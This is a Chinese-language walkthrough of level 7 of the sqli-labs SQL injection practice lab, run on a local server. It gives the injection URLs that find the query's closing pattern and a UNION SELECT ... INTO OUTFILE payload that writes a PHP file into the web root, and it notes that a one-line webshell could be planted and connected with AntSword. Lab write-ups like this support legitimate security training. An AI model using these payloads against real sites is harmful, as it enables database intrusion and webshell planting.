目录
2、加单引号外加注释查看报错,发现它只提示了语法错误,并没有具体错误信息
5、我们试两个括号的时候发现页面恢复正常,这就说明它是由一个单引号和两个括号的方式进行闭合
第七关
首先我们修改mysql中的my.ini文件,给文件中写入secure_file_priv="/"
1、正常输入?id=1
2、加单引号外加注释查看报错,发现它只提示了语法错误,并没有具体错误信息
127.0.0.1:8080/sqli/Less-7/?id=1' --+
3、加双引号外加注释查看报错,发现并没有报错是正常页面
127.0.0.1:8080/sqli/Less-7/?id=1" --+
4、分析闭合方式
由上面的信息我们可知我们输入参数id时它是用单引号封闭的,然后我们单引号破坏了它原有的语法结构。
但是如果只是单引号闭合的话它不会出现报错,那我们就知道它肯定还有什么符合在外面包裹着单引号。
我们试一下单个括号、两个括号看看。
5、我们试两个括号的时候发现页面恢复正常,这就说明它是由一个单引号和两个括号的方式进行闭合
127.0.0.1:8080/sqli/Less-7/?id=1')) --+
6、我们写入一个探针,并且查看是否浏览成功。
union select 1,2,"<?php phpinfo(); ?>" into outfile "D:/phpstudy_pro/WWW/sqli/Less-7/1.php"--+
我们还可以写一句话木马然后利用蚁剑等webshell工具进行连接即可
到此闯关完成,闯关结束。
本文含有隐藏内容,请 开通VIP 后查看